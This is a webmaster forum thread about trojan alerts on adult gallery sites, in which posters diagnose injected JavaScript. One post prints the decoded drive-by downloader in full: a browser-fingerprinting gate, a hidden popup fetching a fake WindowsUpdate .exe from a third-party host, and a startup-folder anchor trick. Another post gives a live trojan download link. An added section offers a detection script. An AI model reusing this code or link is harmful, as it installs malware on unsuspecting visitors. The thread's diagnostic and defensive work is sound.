#1 |
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,281
|
Virus alerts on TGP's
I was submitting galleries today and noticed a Trojan virus detected when loading both the main pages on pornno.com and snakesworld.com. I consider my computer pretty secure. Anyone else noticing this?
|
#2 |
Confirmed User
Join Date: Oct 2003
Location: Port St. Lucie, Florida
Posts: 5,162
|
haven't noticed... and I'm not going to go looking for them
#3 |
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,281
|
hehe - only wondering because I already have done a few spyware scans and nothing was detected so I believe it's not on my pc
|
#4 |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
What spyware programs are you using?..all those free ones do not completely remove them..I have them all and they do find most but not all of them..BTW I looked and didn't get any warnings, I'm guessing it's on your box
#5 |
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,281
|
I use adaware and spybot, I just had a friend visit the sites and got the same virus alerts... I guess you would need Norton to see them
|
#6 |
Confirmed User
Join Date: Jan 2004
Location: dirty south
Posts: 1,515
|
yeah whenever I go out to find more TGPs to submit to, that usually happens. sucks
|
#7 |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
It took a minute but I did get a warning on snakesworld...I have norton as well...maybe he doesn't know he has it
#9 |
The Thrilla in Manila
Join Date: Sep 2004
Location: Thurbs' Lagoon, Christmas Island
Posts: 4,785
|
just use firefox to solve those problems at the source.
|
#10 |
Confirmed User
Join Date: May 2004
Location: Australia
Posts: 1,971
|
yep i get em too
#11 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Posts: 126
|
Hey, you shouldn't be getting any virus alerts. I think you may be infected with some shit. I don't get the warnings and I'm using Norton also.
Did you check your system for "snakesworld" or "pornno"? Also, run CWShredder and see what happens. Get it here http://www.spywareinfo.com/~merijn/downloads.html If you can't get to this page you're infected. If you can, download CWShredder and let me know what happens. If you get the same shit, I'll dig some more. Thanks, Snake |
#12 |
Registered User
Join Date: Mar 2004
Posts: 60
|
I have had this problem! Some tgps on webmaster page (submission page) have viruses and spyware! Install some antivirus, spyware remover and firewall!
|
#13 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com. The first downloaded file name is WindowsUpdate[random number].exe. Here is the javascript line which creates the URL:

```javascript
burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
```

beemk, snakesworld has it at the bottom of the page but higher than the </BODY> tag, pornno has it in the beginning of the Asians section, so I doubt the host can do it. I do not think they are hackers of course, looks like they do it for money.

thurbs, you are right, here is the function from the snakesworld/pornno trojan downloader which decides whether to download the trojan or not:

```javascript
function BadBrowser() {
  // A return value of 1 means "skip this visitor".
  if(navigator.appName!="Microsoft Internet Explorer") return 1;  // not IE
  if(!navigator.cookieEnabled) return 1;                          // cookies disabled
  if(navigator.platform!="Win32") return 1;                       // not 32-bit Windows
  // neither IE 5.5 nor IE 6.x
  if(navigator.userAgent.indexOf("MSIE 5.5")==-1 && navigator.userAgent.indexOf("MSIE 6.")==-1) return 1;
  // marker cookie already set on an earlier visit
  if(document.cookie.indexOf("msip=6x")>-1) return 1;
}
```

Snake, if your site IP is not 64.158.30.220 check your nameserver.
__________________
http://www.germesia.com/ |
#14 |
Confirmed User
Join Date: Oct 2003
Location: California
Posts: 2,397
|
yes i get that shit all the time pretty annoying never gets past the scanner though
|
#15 |
Confirmed User
Join Date: Oct 2001
Location: Somewhere
Posts: 1,588
|
I get the alert when I go to snakesworld as well.
|
#16 |
Confirmed User
Join Date: Mar 2002
Posts: 602
|
Anyone know what these trojans do? Turn machines into spam boxes?
|
#17 |
Registered User
Join Date: Jul 2003
Posts: 24
|
mGreg,
as the name Trojan.DownLoader shows, this program does nothing itself, it just opens the door for ANY trojans. A zillion people scan the Net to find infected computers, then they install on your computer whatever they want, but first of all they download all your passwords. Read here: http://www.viruslibrary.com/virusinf...Downloader.htm
__________________
http://www.germesia.com/ |
#18 |
Die With Your Boots On
Join Date: Oct 2003
Location: Hawaii
Posts: 22,872
|
I had some nasty shit installed while doing movie galleries. Don't remember what site it was, but it fucked my shit up for awhile. Just watch yourself, it's a crazy world out there man.
#19 | |
Confirmed User
Join Date: Mar 2002
Posts: 602
|
Quote:
|
|
#20 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Posts: 126
|
I'd like to see the source code you guys are seeing. I'm not doing this for money, who the fuck is Rocky's Porn Palace anyway?
I think your computers are infected, cause I see nothing on my end. I see nothing on the server or in the source or the page when I look at it, unless it's some of that new "invisible text".... Where on my page do you see the code? How long has this been happening? Do you think the js code for Nasty's Camcrush link could be hijacked? or just the cause of Norton alerts. I get nothing here on my end. The only thing I've changed is that link to Camcrush and now I'm getting complaints. Help me out here. Thanks Snake |
#21 | |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
Quote:
Clear your cookies (at least from snakesworld.com) and load your main page - then view source. You'll see a block of encoded javascript at the bottom, just beneath your copyright. I've done this twice to be sure - without clearing cookies, it happens once, then everything is fine. Clear the cookie, and it comes back the next time you load the page. I'd post the javascript here, but I don't know what would happen :-) |
|
#22 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Posts: 126
|
Cleared cookies and don't see it. I think you have a virus in your machine. It's definitely not being done purposely on my end. Check my page again, I'll remove the js bullshit and let me know if it happens again.
thanks, Snake |
#23 | |
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,281
|
Quote:
I no longer see it on your page, but if you look at pornno.com in the "Asians" section of the html you will see it. Have you re-uploaded your links.html file recently? That might be why it's not showing right now. |
|
#24 |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
I pulled this from links.html just a few minutes ago.
Hey - I know you are not doing it on purpose - just trying to help ya out :-) |
#25 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Snake, this code was found on snakesworld and pornno from many machines (mostly UNIX), so I doubt they all could be infected.
Please show us the code you have between Copyright 1997-2004</FONT></FONT> </CENTER> and </BODY></HTML>. We all see encoded javascript there. Here you can see this script decoded:

```javascript
var pop; var uploaded; var obj; var burl; var hiddenImg; var totalobj;

// Visitor gate: returns 1 for anyone who is not IE 5.5/6 on Win32 with
// cookies enabled, or who already carries the "msip=6x" marker cookie.
function BadBrowser() {
  if(navigator.appName!="Microsoft Internet Explorer") return 1;
  if(!navigator.cookieEnabled) return 1;
  if(navigator.platform!="Win32") return 1;
  if(navigator.userAgent.indexOf("MSIE 5.5")==-1 && navigator.userAgent.indexOf("MSIE 6.")==-1) return 1;
  if(document.cookie.indexOf("msip=6x")>-1) return 1;
}
uploaded=BadBrowser();
if(!uploaded) {
  // Randomised file name under a fixed path on the third-party host.
  burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
}

// Builds a 1x1 IE popup whose hidden <img dynsrc=...> points at the .exe URL.
function initpop() {
  if(!pop) {
    pop=window.createPopup();
    var oBody = pop.document.body;
    pop.document.bgColor="black";
    oBody.style.border = "solid black 0px";
    oBody.style.position="absolute";
    oBody.style.left= "0";
    oBody.style.top= "0";
    var temp;
    temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\").style.visibility=\"hidden\"' ";
    temp+= "onMouseOut='document.getElementById(\"client\").style.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").style.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_frame\").style.visibility=\"visible\";parent.pop.show(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";
    oBody.innerHTML=temp;
  }
}

function clean() { uploaded=1; if(pop) pop.hide(); }

if(!uploaded) { initpop(); window.onbeforeunload=clean; }

// Sets the marker cookie so the same visitor is skipped on later loads,
// then replays the click on the link the visitor was over.
function DoClick() {
  document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;";
  window.setTimeout('obj.click();',300);
}

// Moves the popup under the mouse pointer whenever it passes over a link.
function showpop() {
  if(uploaded) return;
  obj=window.event.srcElement;
  if(!pop) { initpop(); }
  pop.show(window.event.screenX,window.event.screenY,1,1);
  document.getElementById("i_frame").style.left=window.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
  document.getElementById("i_frame").style.top=window.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}

// Re-attaches showpop to every <A> on the page every 400 ms.
function SetAllEvents() {
  if(pop.document.readyState=="complete" && totalobj!=document.all.length) {
    totalobj=document.all.length;
    for(i = 0; i < document.all.length; i++){
      if(document.all(i).tagName=="A" && document.all(i).id!="clientcall") document.all(i).onmousemove=showpop;}
  }
  setTimeout("SetAllEvents();", 400);
}

if(!uploaded) {
  setTimeout("SetAllEvents();", 400);
  window.setTimeout('window.defaultStatus=" "',2000);
  // Hidden iframe plus an AnchorClick anchor that targets shell:startup.
  document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;left=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
  document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url(#default#AnchorClick);"></a>');
  document.getElementById("clientcall").click();
  document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}
```
__________________
http://www.germesia.com/ |
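A defender-side check for what this thread turns up, as an added example that is not part of any post: it scans saved page source for the constructs in the decoded script quoted above and for script blocks sitting between the copyright footer and </BODY>. The function names, indicator labels and sample pages are constructed for illustration.

```javascript
// Added example: static triage of saved page source for the injection
// discussed in this thread. All names and sample pages are constructed.

// Constructs that appear in the decoded script quoted above.
const INDICATORS = [
  { id: "encoded-script",
    re: /<script[^>]+language\s*=\s*["']?(?:JScript|VBScript)\.Encode/i },
  { id: "startup-folder-anchor", re: /folder\s*=\s*["']?shell:startup/i },
  { id: "anchorclick-behavior",
    re: /behavior\s*:\s*url\s*\(\s*#default#AnchorClick\s*\)/i },
  { id: "dynsrc-attribute", re: /\bdynsrc\s*=/i },
  { id: "create-popup", re: /window\.createPopup\s*\(/i },
  { id: "fake-windowsupdate-exe", re: /WindowsUpdate[^;\n]{0,80}\.exe/i },
  { id: "gate-cookie", re: /msip=6x/ },
];

// Script tags between the last footer marker and </body>: the spot where
// posters found the injected block. A hit is a prompt for review, since
// the page owner says nothing belongs there.
function trailingScripts(html, footerMarker = "Copyright") {
  const lower = html.toLowerCase();
  const start = lower.lastIndexOf(footerMarker.toLowerCase());
  if (start === -1) return [];
  let end = lower.indexOf("</body>", start);
  if (end === -1) end = html.length; // no closing tag: scan to end of file
  return html.slice(start, end).match(/<script\b[^>]*>/gi) || [];
}

function scanPage(html) {
  const hits = INDICATORS.filter((i) => i.re.test(html)).map((i) => i.id);
  if (trailingScripts(html).length > 0) hits.push("script-after-footer");
  return { suspicious: hits.length > 0, hits };
}

// Posters saw the block come and go between loads of the same URL, so
// judge a page on several saved fetches rather than one.
function scanSnapshots(snapshots) {
  const flagged = snapshots.map((s) => scanPage(s)).filter((r) => r.suspicious).length;
  return { total: snapshots.length, flagged,
           intermittent: flagged > 0 && flagged < snapshots.length };
}

// Constructed samples (not captured from the sites named in the thread).
const CLEAN_PAGE = `<html><body><a href="g1.html">gallery</a>
<center><font>Copyright 1997-2004</font></center>
</body></html>`;

const INJECTED_PAGE = `<html><body><a href="g1.html">gallery</a>
<center><font>Copyright 1997-2004</font></center>
<script language="JScript.Encode">ENCODED-PLACEHOLDER</script>
</body></html>`;

const DECODED_FRAGMENT = `pop=window.createPopup();
document.cookie="msip=6x; path=/;";
document.write('<a folder="shell:startup" id="clientcall" style="behavior:url(#default#AnchorClick);"></a>');`;

console.log(scanPage(INJECTED_PAGE));
console.log(scanPage(DECODED_FRAGMENT));
console.log(scanSnapshots([CLEAN_PAGE, INJECTED_PAGE, CLEAN_PAGE]));
```

Run it against source saved from disk or from several fetches, not against the browser's rendered DOM, since the block is only visible in the raw page source.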
#26 | |
congrats to the winners
Industry Role:
Join Date: Nov 2001
Location: Echo Beach
Posts: 10,891
|
Quote:
|
|
#27 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Posts: 126
|
Germes,
There is no code on my pages between the area you mentioned. I think when I had the .js script on there for NastyDollars Cam site it was exploited by a js exploit. I'm not an expert but it seems to only affect certain machines. I see Pornno.com also runs a few .js scripts and I do see the jscript encode in his source, but not on my pages. Can you take a look in my archives where I only have the "Adult Friend Finder" link at the bottom http://www.snakesworld.com/oct1618.html and tell me if you see the same shit. If not, I think "Rocky" has a little explaining to do. BTW, I know you guys are trying to help and I appreciate it. |
#28 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Hello Shemp!
Sometimes I do not see it either. A few minutes later I see it from the same IP. Clean up cookies and try again.
__________________
http://www.germesia.com/ |
#29 | |
congrats to the winners
Industry Role:
Join Date: Nov 2001
Location: Echo Beach
Posts: 10,891
|
Quote:
|
|
#30 |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
I just bit the bullet and loaded up rockyspornpalace.. nothing major, but massive popups...
|
#31 |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
It's gone now..
#32 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Snake,
page http://www.snakesworld.com/oct1618.html looks clean for me. If you do not have any code on the page, check httpd.conf and .htaccess files. There are not too many ways to insert code.
__________________
http://www.germesia.com/ |
#33 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Posts: 126
|
I removed the .js from my page earlier, is anyone still seeing the jscript encode?
I emailed Pornno, but don't know if I have the right contact info, if anyone has it they should let him know what's up. Also, Shemp this is perplexing to me also, but what's worse is I may actually break 50 posts on GFY after all these years! |
#34 |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
If you can't see the code, and don't get the virus/trojan notification from Norton (assuming you do have norton installed) try changing your IE settings to request a new copy of the page each visit. eg; Tools->Internet Options->Temporary Internet Files-->Settings-->Every Visit
When I do this I get the code and the norton popups every time I refresh the links.html page. |
#35 | |
congrats to the winners
Industry Role:
Join Date: Nov 2001
Location: Echo Beach
Posts: 10,891
|
Quote:
|
|
#36 |
Registered User
Join Date: Jul 2003
Posts: 24
|
spunky, no, it is back
fusionx, try to download http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate31327.exe but be careful, it is a trojan.
Shemp, yes, cheaters are smart. BTW, gallery http://www.darkestelf.com/dp19t.htm on your TGP redirects to http://stats.yourownfreehost.com/redir.php?buyer_id=147&userid=cheyenne&is_u=0
__________________
http://www.germesia.com/ |
#37 |
Registered User
Join Date: Feb 2003
Posts: 26
|
Snake I just visited your page and got 3 prompts from McAfee for trojans, I looked at your source and saw the code at the very bottom of your page. This is after your camcrush links were removed.
|
#38 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Sorry, Snake, but I still can see this code
__________________
http://www.germesia.com/ |
#39 |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
Hmmm.deleted cookies and went here... http://www.snakesworld.com/links.html
...seemed fine here,no trojan warnings
#40 | |
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,281
|
Quote:
|
|
#41 |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
I was able to download it, but it downloaded as a 0 (zero) byte file.
I have about 20 of them in my temp files directory. They are 9kb in size. I copied it to an old machine and ran it just for fun. All it did was open a URL in my browser to download the same file. (same URL at rockys). Nothing new is running in system processes. I'm running a full scan with norton, and I'll also run one with AVG and AdAware just to check. I'm not at all sure what it's supposed to be doing. According to Symantec, the class "trojan horse" is just a generic label when they don't really know what it is. The classification is based on behavior, not contents. It seems pretty harmless, so far. Just a pain in the butt. |
#42 |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
Still fucking sucks..surfers freak out and close the page instantly regardless if it is harmless..
#43 |
congrats to the winners
Industry Role:
Join Date: Nov 2001
Location: Echo Beach
Posts: 10,891
|
is anyone else getting a redirection on this gallery?
http://www.darkestelf.com/dp19t.htm |
#44 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Usually programs like this can remember IP.
Just checked from UNIX (new IP), code is still there. fusionx, second time from the same URL they upload to your comp another program. Read about trojans somewhere else, they are not harmless.
__________________
http://www.germesia.com/ |
#45 |
Registered User
Join Date: Jul 2003
Posts: 24
|
Shemp, it is traffic-shop hosting, they redirect a few percent of traffic
__________________
http://www.germesia.com/ |
#46 | |
I need a beer
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,943
|
Quote:
#47 |
Too lazy to set a custom title
Industry Role:
Join Date: Mar 2004
Posts: 16,116
|
I just got a popup from norton with the trojan....Shit is still on there..
And I have paid versions of a few nice spyware scanners and I scanned earlier today along with norton so I have nothing on my machine...Well now I do.
__________________
Your Paysite Partner Strength In Numbers! StickyDollars | RadicalCash | KennysPennies | HomegrownCash |
#48 | |
Confirmed User
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
|
Quote:
I checked my system registry and there's nothing new in the Run, RunOnce or RunAsService keys. It is odd that I can't find anything on the web that describes a trojan or any hijack attempt that creates a file named this way (windowsupdatexxxxx.exe). |
|
#49 | |
congrats to the winners
Industry Role:
Join Date: Nov 2001
Location: Echo Beach
Posts: 10,891
|
Quote:
|
|
#50 | |
I am an Alien from space
Industry Role:
Join Date: May 2003
Location: Ontario, Canada
Posts: 11,118
|
Quote:
__________________
ICQ: 16544251 - Skype: gator37 @ eastlink.ca - email: yngwie @ isys.ca |
|